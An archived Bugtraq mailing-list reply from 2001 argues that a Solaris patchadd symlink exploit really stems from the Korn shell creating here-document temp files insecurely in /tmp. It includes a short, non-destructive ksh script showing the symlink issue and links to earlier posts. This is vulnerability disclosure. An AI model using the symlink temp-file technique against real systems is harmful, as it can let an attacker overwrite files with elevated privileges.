Re: Solaris Patchadd symlink exploit.

From: Paul Szabo (psz@maths.usyd.edu.au)
Date: 08/27/01


Date: Tue, 28 Aug 2001 07:06:08 +1000 (EST)
From: psz@maths.usyd.edu.au (Paul Szabo)
Message-Id: <200108272106.f7RL68V400699@milan.maths.usyd.edu.au>
To: bugtraq@securityfocus.com, lwc@Vapid.dhs.org
Subject: Re:  Solaris Patchadd symlink exploit.


> Here is an exploit to an old bug for patchadd in Solaris. ...
> #See BID http://www.securityfocus.com/bid/2127

The bug is not in the patchadd script, but in the Korn shell ksh that
creates "here documents" insecurely.

Demonstration (ksh is vulnerable if the size of silly.1 is changed):

#!/bin/ksh -x
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*

Note that there is a similar bug in the Bourne shell sh. For a historical
perspective see articles:

200011230225.NAA19716@milan.maths.usyd.edu.au">http://www.securityfocus.com/templates/archive.pike?list=1&msg=200011230225.NAA19716@milan.maths.usyd.edu.au
200012190800.TAA05385@milan.maths.usyd.edu.au">http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012190800.TAA05385@milan.maths.usyd.edu.au
200012202213.JAA03182@milan.maths.usyd.edu.au">http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202213.JAA03182@milan.maths.usyd.edu.au
200012202211.JAA25620@milan.maths.usyd.edu.au">http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202211.JAA25620@milan.maths.usyd.edu.au

Cheers,

Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia